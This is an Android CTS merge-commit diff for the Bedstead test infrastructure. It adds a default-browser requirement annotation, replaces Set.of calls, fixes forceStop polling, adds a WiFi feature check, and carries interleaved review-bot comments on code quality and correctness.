Merge "Do not use sample flags in queueInputBuffer" into main am: 3dd7db05d3
Original change: https://android-review.googlesource.com/c/platform/cts/+/2846340
Change-Id: Ifd8818d2ea2b74f1ce8e248177da4104b49ab06a
Signed-off-by: Automerger Merge Worker <android-build-automerger-merge-worker@system.gserviceaccount.com>
diff --git a/apps/CtsVerifier/res/values/strings.xml b/apps/CtsVerifier/res/values/strings.xml
index 62423bb..b8c3b64 100644
--- a/apps/CtsVerifier/res/values/strings.xml
+++ b/apps/CtsVerifier/res/values/strings.xml
@@ -2395,7 +2395,7 @@
particular ringer mode states works properly.
</string>
<string name="ringer_mode_pass_test">These tests are handled by CTS.</string>
- <string name="test_sound_effects">Test touch sound</string>
+ <string name="test_sound_effects">Test Tap & click sounds</string>
<string name="test_vibrate_notification">Test vibrate notification</string>
<string name="test_vibrate_ringer">Test vibrate ringer</string>
<string name="test_access_ringer_mode">Test access ringer mode</string>
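Review bot: As shown here the new value contains a bare `&` (`Test Tap & click sounds`), which is not well-formed XML and would fail resource compilation if it is literal in the file rather than an artifact of how this page renders entities. The value should read `Test Tap &amp; click sounds`. The same applies to `enable_sound_effects` in the next hunk.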
@@ -2403,7 +2403,7 @@
<string name="test_volume_dnd_affected_stream">Test volume change</string>
<string name="test_mute_dnd_affected_streams">Test mute streams</string>
<string name="test_ringer_manager">Test RingtoneManager</string>
- <string name="enable_sound_effects">Please enable touch sound in Sound settings.</string>
+ <string name="enable_sound_effects">Please enable Tap & click sounds in Sound settings.</string>
<string name="attention_ready">I\'m done</string>
<string name="attention_filter_any">Please enable \"Do not disturb\" by tapping the Quick Settings tile.</string>
<string name="attention_filter_all">Please disable \"Do not disturb\" by tapping the Quick Settings tile.</string>
diff --git a/common/device-side/bedstead/harrier/common/src/main/java/com/android/bedstead/harrier/annotations/RequireHasDefaultBrowser.java b/common/device-side/bedstead/harrier/common/src/main/java/com/android/bedstead/harrier/annotations/RequireHasDefaultBrowser.java
new file mode 100644
index 0000000..8537764
--- /dev/null
+++ b/common/device-side/bedstead/harrier/common/src/main/java/com/android/bedstead/harrier/annotations/RequireHasDefaultBrowser.java
@@ -0,0 +1,37 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package com.android.bedstead.harrier.annotations;
+
+import static com.android.bedstead.harrier.UserType.INSTRUMENTED_USER;
+
+import com.android.bedstead.harrier.UserType;
+import java.lang.annotation.ElementType;
+import java.lang.annotation.Retention;
+import java.lang.annotation.RetentionPolicy;
+import java.lang.annotation.Target;
+
+/**
+ * Requires the user has a default browser
+ */
+@Target({ElementType.METHOD, ElementType.ANNOTATION_TYPE, ElementType.TYPE})
+@Retention(value = RetentionPolicy.RUNTIME)
+public @interface RequireHasDefaultBrowser {
+ /** Which user type should we check the browser for. */
+ UserType forUser() default INSTRUMENTED_USER;
+
+ FailureMode failureMode() default FailureMode.SKIP;
+}
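Review bot: `failureMode()` has no Javadoc while `forUser()` does; add `/** Whether the test is skipped or failed when the user has no default browser. */`. The class comment could also say how "default browser" is determined, since DeviceState enforces it with `TestApis.packages().defaultBrowserForUser(user)`, which is based on intent resolution.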
diff --git a/common/device-side/bedstead/harrier/src/main/java/com/android/bedstead/harrier/BedsteadJUnit4.java b/common/device-side/bedstead/harrier/src/main/java/com/android/bedstead/harrier/BedsteadJUnit4.java
index 23919f3..e0f53be 100644
--- a/common/device-side/bedstead/harrier/src/main/java/com/android/bedstead/harrier/BedsteadJUnit4.java
+++ b/common/device-side/bedstead/harrier/src/main/java/com/android/bedstead/harrier/BedsteadJUnit4.java
@@ -61,6 +61,7 @@
import com.google.auto.value.AutoAnnotation;
import com.google.common.collect.ImmutableMap;
+import com.google.common.collect.ImmutableSet;
import org.junit.Test;
import org.junit.rules.TestRule;
@@ -693,7 +694,7 @@
}
if (enterprisePolicy.delegatedScopes().length > 0) {
- Set<String> newDelegatedScopes = Set.of(enterprisePolicy.delegatedScopes());
+ ImmutableSet<String> newDelegatedScopes = ImmutableSet.copyOf(enterprisePolicy.delegatedScopes());
if (!delegatedScopes.isEmpty()
&& !delegatedScopes.containsAll(newDelegatedScopes)) {
throw new IllegalStateException("Cannot merge multiple policies which define "
diff --git a/common/device-side/bedstead/harrier/src/main/java/com/android/bedstead/harrier/DeviceState.java b/common/device-side/bedstead/harrier/src/main/java/com/android/bedstead/harrier/DeviceState.java
index bb57dda9..1e6bdbe 100644
--- a/common/device-side/bedstead/harrier/src/main/java/com/android/bedstead/harrier/DeviceState.java
+++ b/common/device-side/bedstead/harrier/src/main/java/com/android/bedstead/harrier/DeviceState.java
@@ -100,6 +100,7 @@
import com.android.bedstead.harrier.annotations.RequireFeatureFlagEnabled;
import com.android.bedstead.harrier.annotations.RequireFeatureFlagNotEnabled;
import com.android.bedstead.harrier.annotations.RequireFeatureFlagValue;
+import com.android.bedstead.harrier.annotations.RequireHasDefaultBrowser;
import com.android.bedstead.harrier.annotations.RequireHeadlessSystemUserMode;
import com.android.bedstead.harrier.annotations.RequireInstantApp;
import com.android.bedstead.harrier.annotations.RequireLowRamDevice;
@@ -1294,6 +1295,18 @@
continue;
}
+ if (annotation instanceof RequireHasDefaultBrowser) {
+ RequireHasDefaultBrowser requireHasDefaultBrowser =
+ (RequireHasDefaultBrowser) annotation;
+ UserReference user =
+ resolveUserTypeToUser(requireHasDefaultBrowser.forUser());
+
+ checkFailOrSkip("User: " + user + " does not have a default browser",
+ TestApis.packages().defaultBrowserForUser(user) != null,
+ requireHasDefaultBrowser.failureMode());
+ continue;
+ }
+
if (annotation instanceof RequireTelephonySupport) {
RequireTelephonySupport requireTelephonySupport =
(RequireTelephonySupport) annotation;
@@ -1407,6 +1420,7 @@
}
annotations.addAll(description.getAnnotations());
+ annotations.sort(BedsteadJUnit4::annotationSorter);
checkAnnotations(annotations);
@@ -4016,14 +4030,14 @@
.findFirst();
if (account.isPresent()) {
- accounts(onUser).setFeatures(account.get(), Set.of(features));
+ accounts(onUser).setFeatures(account.get(), new HashSet<>(Arrays.asList(features)));
mAccounts.put(key, account.get());
TestApis.devicePolicy().calculateHasIncompatibleAccounts();
return account.get();
}
AccountReference createdAccount = accounts(onUser).addAccount()
- .features(Set.of(features))
+ .features(new HashSet<>(Arrays.asList(features)))
.add();
mCreatedAccounts.add(createdAccount);
mAccounts.put(key, createdAccount);
@@ -4168,7 +4182,7 @@
private boolean trySetUserRestrictionWithDeviceOwner(String restriction) {
ensureHasDeviceOwner(FailureMode.FAIL,
/* isPrimary= */ false, EnsureHasDeviceOwner.HeadlessDeviceOwnerType.NONE,
- /* affiliationIds= */ Set.of(), /* type= */ DeviceOwnerType.DEFAULT,
+ /* affiliationIds= */ new HashSet<>(), /* type= */ DeviceOwnerType.DEFAULT,
EnsureHasDeviceOwner.DEFAULT_KEY, new TestAppProvider().query());
RemotePolicyManager dpc = deviceOwner();
@@ -4186,7 +4200,7 @@
private boolean trySetUserRestrictionWithProfileOwner(UserReference onUser, String restriction) {
ensureHasProfileOwner(onUser,
/* isPrimary= */ false, /* isParentInstance= */ false,
- /* affiliationIds= */ Set.of(), EnsureHasProfileOwner.DEFAULT_KEY,
+ /* affiliationIds= */ new HashSet<>(), EnsureHasProfileOwner.DEFAULT_KEY,
new TestAppProvider().query());
RemotePolicyManager dpc = profileOwner(onUser);
@@ -4204,7 +4218,7 @@
private boolean tryClearUserRestrictionWithDeviceOwner(String restriction) {
ensureHasDeviceOwner(FailureMode.FAIL,
/* isPrimary= */ false, EnsureHasDeviceOwner.HeadlessDeviceOwnerType.NONE,
- /* affiliationIds= */ Set.of(), /* type= */ DeviceOwnerType.DEFAULT,
+ /* affiliationIds= */ new HashSet<>(), /* type= */ DeviceOwnerType.DEFAULT,
EnsureHasDeviceOwner.DEFAULT_KEY, new TestAppProvider().query());
RemotePolicyManager dpc = deviceOwner();
@@ -4222,7 +4236,7 @@
private boolean tryClearUserRestrictionWithProfileOwner(UserReference onUser, String restriction) {
ensureHasProfileOwner(onUser,
/* isPrimary= */ false, /* isParentInstance= */ false,
- /* affiliationIds= */ Set.of(), EnsureHasProfileOwner.DEFAULT_KEY,
+ /* affiliationIds= */ new HashSet<>(), EnsureHasProfileOwner.DEFAULT_KEY,
new TestAppProvider().query());
RemotePolicyManager dpc = profileOwner(onUser);
diff --git a/common/device-side/bedstead/harrier/src/main/java/com/android/bedstead/harrier/Policy.java b/common/device-side/bedstead/harrier/src/main/java/com/android/bedstead/harrier/Policy.java
index c519b7a..a63932d 100644
--- a/common/device-side/bedstead/harrier/src/main/java/com/android/bedstead/harrier/Policy.java
+++ b/common/device-side/bedstead/harrier/src/main/java/com/android/bedstead/harrier/Policy.java
@@ -439,11 +439,11 @@
existingAnnotations.length + 1);
newAnnotations[newAnnotations.length - 1] = ensureHasDevicePolicyManagerRoleHolder(
roleHolderUser, /* isPrimary= */ true);
- return Set.of(annotation,
+ return new HashSet<>(Arrays.asList(annotation,
new DynamicParameterizedAnnotation(
annotation.annotationType().getSimpleName() + "_DPMRH",
newAnnotations
- ));
+ )));
};
}
@@ -894,7 +894,7 @@
for (Annotation annotation : annotations) {
shadowingAnnotations.addAll(
- sReverseShadowMap.getOrDefault(annotation.annotationType(), Set.of()));
+ sReverseShadowMap.getOrDefault(annotation.annotationType(), new HashSet<>()));
}
annotations.removeIf(a -> shadowingAnnotations.contains(a.annotationType()));
diff --git a/common/device-side/bedstead/harrier/src/test/java/com/android/bedstead/harrier/DeviceStateTest.java b/common/device-side/bedstead/harrier/src/test/java/com/android/bedstead/harrier/DeviceStateTest.java
index e998853..d5dc680 100644
--- a/common/device-side/bedstead/harrier/src/test/java/com/android/bedstead/harrier/DeviceStateTest.java
+++ b/common/device-side/bedstead/harrier/src/test/java/com/android/bedstead/harrier/DeviceStateTest.java
@@ -54,6 +54,7 @@
import android.app.ActivityManager;
import android.app.admin.DevicePolicyManager;
import android.app.contentsuggestions.ContentSuggestionsManager;
+import android.app.role.RoleManager;
import android.os.Build;
import android.os.Bundle;
import android.os.UserManager;
@@ -108,6 +109,7 @@
import com.android.bedstead.harrier.annotations.RequireFeatureFlagNotEnabled;
import com.android.bedstead.harrier.annotations.RequireFeatureFlagValue;
import com.android.bedstead.harrier.annotations.RequireGmsBuild;
+import com.android.bedstead.harrier.annotations.RequireHasDefaultBrowser;
import com.android.bedstead.harrier.annotations.RequireHeadlessSystemUserMode;
import com.android.bedstead.harrier.annotations.RequireInstantApp;
import com.android.bedstead.harrier.annotations.RequireLowRamDevice;
@@ -1638,4 +1640,9 @@
assertThat(TestApis.content().suggestions().defaultServiceEnabled(sDeviceState.additionalUser())).isTrue();
}
+ @Test
+ @RequireHasDefaultBrowser
+ public void requireHasDefaultBrowser_onDifferentUser_defaultContentSuggestionsServiceIsEnabled() {
+ assertThat(TestApis.roles().getRoleHolders(RoleManager.ROLE_BROWSER)).isNotEmpty();
+ }
}
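Review bot: The test name `requireHasDefaultBrowser_onDifferentUser_defaultContentSuggestionsServiceIsEnabled` appears to be copied from the test above it: the annotation is used with its default `forUser`, and nothing about content suggestions is asserted. A name such as `requireHasDefaultBrowserAnnotation_hasDefaultBrowser` would describe what is checked. The assertion also looks at `ROLE_BROWSER` role holders, whereas the annotation is enforced through intent resolution in `defaultBrowserForUser`, so the two can disagree. Asserting `assertThat(TestApis.packages().defaultBrowserForUser(TestApis.users().instrumented())).isNotNull();` would test the same condition the annotation checks.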
diff --git a/common/device-side/bedstead/nene/src/main/java/com/android/bedstead/nene/accounts/AccountBuilder.java b/common/device-side/bedstead/nene/src/main/java/com/android/bedstead/nene/accounts/AccountBuilder.java
index 0a4930f..26b2127 100644
--- a/common/device-side/bedstead/nene/src/main/java/com/android/bedstead/nene/accounts/AccountBuilder.java
+++ b/common/device-side/bedstead/nene/src/main/java/com/android/bedstead/nene/accounts/AccountBuilder.java
@@ -25,6 +25,7 @@
import java.io.IOException;
import java.util.ArrayList;
+import java.util.Arrays;
import java.util.HashSet;
import java.util.Set;
import java.util.UUID;
@@ -102,7 +103,7 @@
* Add features to the account.
*/
public AccountBuilder addFeatures(String... feature) {
- mFeatures.addAll(Set.of(feature));
+ mFeatures.addAll(new HashSet<>(Arrays.asList(feature)));
return this;
}
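Review bot: The temporary `HashSet` in `addFeatures` is not needed, because `addAll` accepts any collection; `mFeatures.addAll(Arrays.asList(feature));` does the same work. The same applies to `containsAll(new HashSet<>(Arrays.asList(features)))` in TestAppAccountAuthenticator.java. It is worth a short comment that, unlike `Set.of`, this form silently accepts duplicate and null entries instead of throwing.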
diff --git a/common/device-side/bedstead/nene/src/main/java/com/android/bedstead/nene/packages/Package.java b/common/device-side/bedstead/nene/src/main/java/com/android/bedstead/nene/packages/Package.java
index 361de58..7ba1c55 100644
--- a/common/device-side/bedstead/nene/src/main/java/com/android/bedstead/nene/packages/Package.java
+++ b/common/device-side/bedstead/nene/src/main/java/com/android/bedstead/nene/packages/Package.java
@@ -716,16 +716,20 @@
PackageManager userPackageManager =
TestApis.context().androidContextAsUser(user).getPackageManager();
-
+ boolean shouldCheckPreviousProcess = runningProcess() != null;
// In most cases this should work first time, however if a user restriction has been
// recently removed we may need to retry
+
+ int previousPid = shouldCheckPreviousProcess ? runningProcess().pid() : -1;
+
Poll.forValue("Application flag", () -> {
userActivityManager.forceStopPackage(mPackageName);
- return userPackageManager.getPackageInfo(mPackageName, PackageManager.GET_META_DATA)
- .applicationInfo.flags;
- })
- .toMeet(flag -> (flag & FLAG_STOPPED) == FLAG_STOPPED)
+ return userPackageManager.getPackageInfo(mPackageName,
+ PackageManager.GET_META_DATA)
+ .applicationInfo.flags;
+ }).toMeet(flag -> !shouldCheckPreviousProcess || (flag & FLAG_STOPPED) == FLAG_STOPPED
+ || previousPid != runningProcess().pid())
.errorOnFail("Expected application flags to contain FLAG_STOPPED ("
+ FLAG_STOPPED + ")")
.await();
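Review bot: The new predicate calls `runningProcess().pid()` without a null check, so if the package was running, has been killed by `forceStopPackage` and has not restarted while FLAG_STOPPED is not yet visible, the poll throws a NullPointerException instead of retrying. The same double read exists before the poll: `runningProcess()` is evaluated once for `shouldCheckPreviousProcess` and again for `previousPid`, and the process can exit between the two calls. Reading the process once into a local and null-checking inside the predicate avoids both. When nothing was running the predicate passes without looking at the flag, so the `errorOnFail` text no longer describes every exit condition. The enclosing method starts and ends outside this hunk, and the fence assumes `runningProcess()` returns `ProcessReference`.

```java
ProcessReference previousProcess = runningProcess();
int previousPid = previousProcess != null ? previousProcess.pid() : -1;

// … unchanged: Poll.forValue("Application flag", …) supplier …
}).toMeet(flag -> {
    if (previousProcess == null || (flag & FLAG_STOPPED) == FLAG_STOPPED) {
        return true;
    }
    ProcessReference current = runningProcess();
    return current != null && current.pid() != previousPid;
})
// … unchanged: errorOnFail(…).await() …
```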
diff --git a/common/device-side/bedstead/nene/src/main/java/com/android/bedstead/nene/packages/Packages.java b/common/device-side/bedstead/nene/src/main/java/com/android/bedstead/nene/packages/Packages.java
index d6cc3ae..7bce3ca 100644
--- a/common/device-side/bedstead/nene/src/main/java/com/android/bedstead/nene/packages/Packages.java
+++ b/common/device-side/bedstead/nene/src/main/java/com/android/bedstead/nene/packages/Packages.java
@@ -19,12 +19,15 @@
import static android.Manifest.permission.INSTALL_PACKAGES;
import static android.Manifest.permission.INTERACT_ACROSS_USERS;
import static android.Manifest.permission.INTERACT_ACROSS_USERS_FULL;
+import static android.content.Intent.ACTION_VIEW;
import static android.content.pm.PackageInstaller.EXTRA_PACKAGE_NAME;
import static android.content.pm.PackageInstaller.EXTRA_STATUS;
import static android.content.pm.PackageInstaller.EXTRA_STATUS_MESSAGE;
import static android.content.pm.PackageInstaller.STATUS_FAILURE;
import static android.content.pm.PackageInstaller.STATUS_SUCCESS;
import static android.content.pm.PackageInstaller.SessionParams.MODE_FULL_INSTALL;
+import static android.content.pm.PackageManager.MATCH_ALL;
+import static android.content.pm.PackageManager.MATCH_DEFAULT_ONLY;
import static android.os.Build.VERSION.SDK_INT;
import static android.os.Build.VERSION_CODES.R;
@@ -39,7 +42,9 @@
import android.content.pm.FeatureInfo;
import android.content.pm.PackageInstaller;
import android.content.pm.PackageManager;
+import android.content.pm.ResolveInfo;
import android.content.res.Resources;
+import android.net.Uri;
import android.os.Build;
import android.util.Log;
@@ -71,7 +76,9 @@
import java.util.Arrays;
import java.util.Collection;
import java.util.HashSet;
+import java.util.List;
import java.util.Objects;
+import java.util.Optional;
import java.util.Set;
import java.util.stream.Collectors;
@@ -727,4 +734,53 @@
public Package launcher() {
return find(TestApis.ui().device().getLauncherPackageName());
}
+
+ /**
+ * Finds the browser assigned to handle browsing intents by default for selected user.
+ *
+ * @return the package for the default browser if there is one, null otherwise.
+ */
+ @SuppressWarnings("NewApi")
+ @Experimental
+ public Package defaultBrowserForUser(UserReference user) {
+ ResolveInfo resolvedActivity;
+ List<ResolveInfo> possibleActivities;
+ Intent toResolve = new Intent(ACTION_VIEW, Uri.parse("http://"));
+
+ PackageManager pm = TestApis.context()
+ .androidContextAsUser(user)
+ .getPackageManager();
+
+ if (Versions.meetsMinimumSdkVersionRequirement(Versions.T)) {
+ possibleActivities = pm.queryIntentActivities(toResolve,
+ PackageManager.ResolveInfoFlags.of(MATCH_ALL));
+ resolvedActivity = pm.resolveActivity(toResolve,
+ PackageManager.ResolveInfoFlags.of(MATCH_DEFAULT_ONLY));
+ } else {
+ possibleActivities = pm.queryIntentActivities(toResolve, MATCH_ALL);
+ resolvedActivity = pm.resolveActivity(toResolve, MATCH_DEFAULT_ONLY);
+ }
+
+ Set<String> possibleBrowserPackageName = possibleActivities.stream()
+ .map(Packages::extractPackageName)
+ .filter(Objects::nonNull)
+ .collect(Collectors.toSet());
+
+ Log.e("SettingTest", "possibleBrowserPackageNames: " + possibleBrowserPackageName);
+
+ String resolvedBrowserPackageName = extractPackageName(resolvedActivity);
+ if (resolvedBrowserPackageName == null
+ || !possibleBrowserPackageName.contains(resolvedBrowserPackageName)) {
+ return null;
+ }
+
+ return find(resolvedBrowserPackageName);
+ }
+
+ private static String extractPackageName(@Nullable ResolveInfo nullableInfo) {
+ return Optional.ofNullable(nullableInfo)
+ .map(resolveInfo -> resolveInfo.activityInfo)
+ .map(activityInfo -> activityInfo.packageName)
+ .orElse(null);
+ }
}
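Review bot: `Log.e("SettingTest", ...)` in `defaultBrowserForUser` looks like leftover debugging: it logs at error level on every call, under a tag unrelated to this class. I would drop it or lower it to something like `Log.d(LOG_TAG, "possibleBrowserPackageNames: " + possibleBrowserPackageName);` (assuming the class has a log tag constant; none is visible in this hunk). The Javadoc lacks an `@param user` line and does not say that only an `http://` VIEW intent is resolved, so a package that is the default for https only would presumably not be found. Since the method returns null when there is no default, marking the return type `@Nullable`, as `extractPackageName` already does for its parameter, would make that contract visible to callers.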
diff --git a/common/device-side/bedstead/nene/src/main/java/com/android/bedstead/nene/users/Users.java b/common/device-side/bedstead/nene/src/main/java/com/android/bedstead/nene/users/Users.java
index 80edf68..0162fc0 100644
--- a/common/device-side/bedstead/nene/src/main/java/com/android/bedstead/nene/users/Users.java
+++ b/common/device-side/bedstead/nene/src/main/java/com/android/bedstead/nene/users/Users.java
@@ -59,6 +59,7 @@
import java.time.Duration;
import java.util.ArrayList;
+import java.util.Arrays;
import java.util.Collection;
import java.util.Comparator;
import java.util.HashMap;
@@ -338,7 +339,7 @@
private UserType managedProfileUserType() {
UserType.MutableUserType managedProfileMutableUserType = new UserType.MutableUserType();
managedProfileMutableUserType.mName = MANAGED_PROFILE_TYPE_NAME;
- managedProfileMutableUserType.mBaseType = Set.of(UserType.BaseType.PROFILE);
+ managedProfileMutableUserType.mBaseType = new HashSet<>(Arrays.asList(UserType.BaseType.PROFILE));
managedProfileMutableUserType.mEnabled = true;
managedProfileMutableUserType.mMaxAllowed = -1;
managedProfileMutableUserType.mMaxAllowedPerParent = 1;
@@ -349,7 +350,7 @@
UserType.MutableUserType managedProfileMutableUserType = new UserType.MutableUserType();
managedProfileMutableUserType.mName = SYSTEM_USER_TYPE_NAME;
managedProfileMutableUserType.mBaseType =
- Set.of(UserType.BaseType.FULL, UserType.BaseType.SYSTEM);
+ new HashSet<>(Arrays.asList(UserType.BaseType.FULL, UserType.BaseType.SYSTEM));
managedProfileMutableUserType.mEnabled = true;
managedProfileMutableUserType.mMaxAllowed = -1;
managedProfileMutableUserType.mMaxAllowedPerParent = -1;
@@ -359,7 +360,7 @@
private UserType secondaryUserType() {
UserType.MutableUserType managedProfileMutableUserType = new UserType.MutableUserType();
managedProfileMutableUserType.mName = SECONDARY_USER_TYPE_NAME;
- managedProfileMutableUserType.mBaseType = Set.of(UserType.BaseType.FULL);
+ managedProfileMutableUserType.mBaseType = new HashSet<>(Arrays.asList(UserType.BaseType.FULL));
managedProfileMutableUserType.mEnabled = true;
managedProfileMutableUserType.mMaxAllowed = -1;
managedProfileMutableUserType.mMaxAllowedPerParent = -1;
diff --git a/common/device-side/bedstead/nene/src/test/java/com/android/bedstead/nene/packages/PackageTest.java b/common/device-side/bedstead/nene/src/test/java/com/android/bedstead/nene/packages/PackageTest.java
index a2a4192..3d14dce 100644
--- a/common/device-side/bedstead/nene/src/test/java/com/android/bedstead/nene/packages/PackageTest.java
+++ b/common/device-side/bedstead/nene/src/test/java/com/android/bedstead/nene/packages/PackageTest.java
@@ -21,6 +21,7 @@
import static com.google.common.truth.Truth.assertThat;
+import static org.junit.Assume.assumeNotNull;
import static org.testng.Assert.assertThrows;
import android.content.Context;
@@ -357,6 +358,24 @@
}
@Test
+ public void forceStop_whenRestartableApp_doesNotLoopEndlessly() {
+ final int previousId = TestApis.packages().launcher().runningProcess().pid();
+ TestApis.packages().launcher().forceStop();
+ assertThat(TestApis.packages().launcher().runningProcess().pid()).isNotEqualTo(previousId);
+ }
+
+ @Test
+ public void forceStop_whenNoRunningProcess_doesNotThrowException() {
+ final Package notRunningPackage = TestApis.packages().installedForUser().stream()
+ .filter(aPackage -> aPackage.runningProcess() == null)
+ .findFirst()
+ .get();
+ assumeNotNull(notRunningPackage);
+
+ notRunningPackage.forceStop();
+ }
+
+ @Test
@EnsureHasSecondaryUser
@RequireRunNotOnSecondaryUser
public void installedOnUsers_doesNotIncludeUserWithoutPackageInstalled() throws Exception {
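Review bot: In `forceStop_whenNoRunningProcess_doesNotThrowException`, `.findFirst().get()` throws NoSuchElementException when every installed package has a running process, so the `assumeNotNull` on the next line can never skip the test. Ending the stream with `.orElse(null);` makes the assumption effective. In `forceStop_whenRestartableApp_doesNotLoopEndlessly`, `runningProcess().pid()` is dereferenced right after `forceStop()`; if the launcher has not been restarted yet this presumably yields a NullPointerException rather than an assertion failure, so polling for a non-null process first would give a readable result. The last context line belongs to a test whose body lies outside the hunk.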
diff --git a/common/device-side/bedstead/nene/src/test/java/com/android/bedstead/nene/users/UserTypeTest.java b/common/device-side/bedstead/nene/src/test/java/com/android/bedstead/nene/users/UserTypeTest.java
index d05e091..603bdaa 100644
--- a/common/device-side/bedstead/nene/src/test/java/com/android/bedstead/nene/users/UserTypeTest.java
+++ b/common/device-side/bedstead/nene/src/test/java/com/android/bedstead/nene/users/UserTypeTest.java
@@ -22,6 +22,8 @@
import org.junit.runner.RunWith;
import org.junit.runners.JUnit4;
+import java.util.Arrays;
+import java.util.HashSet;
import java.util.Set;
@RunWith(JUnit4.class)
@@ -50,7 +52,7 @@
@Test
public void baseType_returnsBaseType() {
UserType.MutableUserType mutableUserType = new UserType.MutableUserType();
- mutableUserType.mBaseType = Set.of(UserType.BaseType.FULL);
+ mutableUserType.mBaseType = new HashSet<>(Arrays.asList(UserType.BaseType.FULL));
UserType userType = new UserType(mutableUserType);
assertThat(userType.baseType()).containsExactly(UserType.BaseType.FULL);
diff --git a/common/device-side/bedstead/remoteaccountauthenticator/src/main/java/com/android/bedstead/remoteaccountauthenticator/RemoteAccountAuthenticator.java b/common/device-side/bedstead/remoteaccountauthenticator/src/main/java/com/android/bedstead/remoteaccountauthenticator/RemoteAccountAuthenticator.java
index 9c813c1..47caa4df 100644
--- a/common/device-side/bedstead/remoteaccountauthenticator/src/main/java/com/android/bedstead/remoteaccountauthenticator/RemoteAccountAuthenticator.java
+++ b/common/device-side/bedstead/remoteaccountauthenticator/src/main/java/com/android/bedstead/remoteaccountauthenticator/RemoteAccountAuthenticator.java
@@ -31,6 +31,8 @@
import java.io.IOException;
import java.util.ArrayList;
+import java.util.Arrays;
+import java.util.HashSet;
import java.util.Set;
import java.util.stream.Collectors;
import java.util.stream.Stream;
@@ -42,9 +44,9 @@
public final class RemoteAccountAuthenticator extends TestAppInstance {
// TODO(263350665): Query account types from xml
- private static final Set<String> ACCOUNT_TYPES = Set.of(
+ private static final Set<String> ACCOUNT_TYPES = new HashSet<>(Arrays.asList(
"com.android.bedstead.remoteaccountauthenticator.account"
- );
+ ));
private static final String REMOTE_ACCOUNT_AUTHENTICATOR_PACKAGE_NAME =
"com.android.RemoteAccountAuthenticator";
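Review bot: `ACCOUNT_TYPES` is a shared `static final` constant, and replacing `Set.of(...)` with `new HashSet<>(...)` makes it mutable, so any code that is handed this set can now alter it for every later use. Wrapping it keeps the earlier guarantee without `Set.of`: `Collections.unmodifiableSet(new HashSet<>(Arrays.asList(...)))`, or `Collections.singleton("com.android.bedstead.remoteaccountauthenticator.account")` for the single entry. Either needs a `java.util.Collections` import, which this hunk does not add. The other `Set.of` replacements in this commit lose immutability in the same way, though those are per-instance or per-call values rather than a shared constant.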
diff --git a/common/device-side/bedstead/testapp/src/testapps/main/java/com/android/bedstead/testapp/TestAppAccountAuthenticator.java b/common/device-side/bedstead/testapp/src/testapps/main/java/com/android/bedstead/testapp/TestAppAccountAuthenticator.java
index 558215e..6ed639d 100644
--- a/common/device-side/bedstead/testapp/src/testapps/main/java/com/android/bedstead/testapp/TestAppAccountAuthenticator.java
+++ b/common/device-side/bedstead/testapp/src/testapps/main/java/com/android/bedstead/testapp/TestAppAccountAuthenticator.java
@@ -26,6 +26,7 @@
import java.util.ArrayList;
import java.util.Arrays;
+import java.util.HashSet;
import java.util.Set;
/**
@@ -132,7 +133,7 @@
hasFeatures = false;
} else {
hasFeatures = Arrays.asList(accountManager.getUserData(account, "features")
- .split(",")).containsAll(Set.of(features));
+ .split(",")).containsAll(new HashSet<>(Arrays.asList(features)));
}
Bundle result = new Bundle();
diff --git a/common/device-side/device-info/src/com/android/compatibility/common/deviceinfo/ConnectivityDeviceInfo.java b/common/device-side/device-info/src/com/android/compatibility/common/deviceinfo/ConnectivityDeviceInfo.java
index 45726b8..c99d9a2 100644
--- a/common/device-side/device-info/src/com/android/compatibility/common/deviceinfo/ConnectivityDeviceInfo.java
+++ b/common/device-side/device-info/src/com/android/compatibility/common/deviceinfo/ConnectivityDeviceInfo.java
@@ -15,9 +15,13 @@
*/
package com.android.compatibility.common.deviceinfo;
+import android.content.pm.PackageManager;
+
import android.net.wifi.ScanResult;
import android.net.wifi.WifiManager;
+import android.os.Build;
+
import android.util.Log;
import com.android.compatibility.common.util.DeviceInfoStore;
@@ -63,12 +67,20 @@
return "";
}
+ private boolean hasWifi() {
+ return getContext().getPackageManager().hasSystemFeature(PackageManager.FEATURE_WIFI);
+ }
+
@Override
protected void collectDeviceInfo(DeviceInfoStore store) throws Exception {
- try {
- collectWifiStandards(store);
- } catch (IOException e) {
- Log.w(LOG_TAG, "Failed to collect WiFi standards", e);
+ if (hasWifi()) {
+ if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.R) {
+ try {
+ collectWifiStandards(store);
+ } catch (IOException e) {
+ Log.w(LOG_TAG, "Failed to collect WiFi standards", e);
+ }
+ }
}
}
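Review bot: The two nested `if` statements in `collectDeviceInfo` can be a single condition, `if (hasWifi() && Build.VERSION.SDK_INT >= Build.VERSION_CODES.R) {`, which removes one level of indentation. A short comment on why the R check is needed would help (presumably `collectWifiStandards` relies on an API added in R; that method is outside this hunk). The new imports are also set apart by blank lines that split the `android.*` group.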
diff --git a/common/device-side/interactive/automation/src/main/java/com/google/android/interactive/steps/enterprise/launcher/DoesLauncherDefaultConfigurationContainPhoneShortcutStepAutomation.java b/common/device-side/interactive/automation/src/main/java/com/google/android/interactive/steps/enterprise/launcher/DoesLauncherDefaultConfigurationContainPhoneShortcutStepAutomation.java
new file mode 100644
index 0000000..4d95158
--- /dev/null
+++ b/common/device-side/interactive/automation/src/main/java/com/google/android/interactive/steps/enterprise/launcher/DoesLauncherDefaultConfigurationContainPhoneShortcutStepAutomation.java
@@ -0,0 +1,30 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+
+package com.google.android.interactive.steps.enterprise.launcher;
+
+import com.android.interactive.Automation;
+import com.android.interactive.annotations.AutomationFor;
+
+@AutomationFor("com.google.android.interactive.steps.enterprise.launcher"
+ + ".DoesLauncherDefaultConfigurationContainPhoneShortcutStep")
+public class DoesLauncherDefaultConfigurationContainPhoneShortcutStepAutomation implements Automation<Boolean> {
+ @Override
